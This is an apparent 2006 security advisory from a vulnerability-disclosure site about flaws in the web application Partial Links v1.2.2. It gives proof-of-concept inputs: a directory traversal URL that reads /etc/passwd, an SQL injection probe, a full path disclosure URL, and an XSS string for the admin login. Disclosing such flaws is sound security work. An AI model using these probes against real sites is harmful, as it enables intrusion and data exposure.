Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Calendar Express 2 SQL injection

  [SA20465] Coppermine Photo Gallery usermgr.php Unspecified Vulnerability

  [SA20475] MiraksGalerie Multiple File Inclusion Vulnerabilities

  [SA20436] PyBlosxom Contributed Packages Cross-Site Scripting Vulnerability

From:luny_(at)_youfucktard.com <luny_(at)_youfucktard.com>
Date:07.06.2006
Subject:Partial Links v1.2.2

Partial Links v1.2.2

Homepage:
http://www.particlesoft.net/particlelinks/

Effected files:
index.php
page_footer.php
admin.php

Exploits & Vulnerabilities:

Possible directory traversal?:
http://www.example.com/Other_Sites/X_%2526_Y/../../../../../etc/passwd/

SQL Injection:
http://www.example.com/index.php?topic='

Full path disclosure via page_footer.php:
http://www.example.com/includes/page_footer.php

Fatal error: Call to a member function on a non-object in
/home/username/public_html/links/includes/page_footer.php

on line 3

((It should be notedpage_header.php gives full path errors too))

The input form box to login as admin can be spoofed to remove the max char limit allowed and the input
data isn't properally sanatized before being generated dynamically too.

For proof of concept try entering the following in the username box:

>'';!--"<XSS><img src=lol.jpg>=&{()}<

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru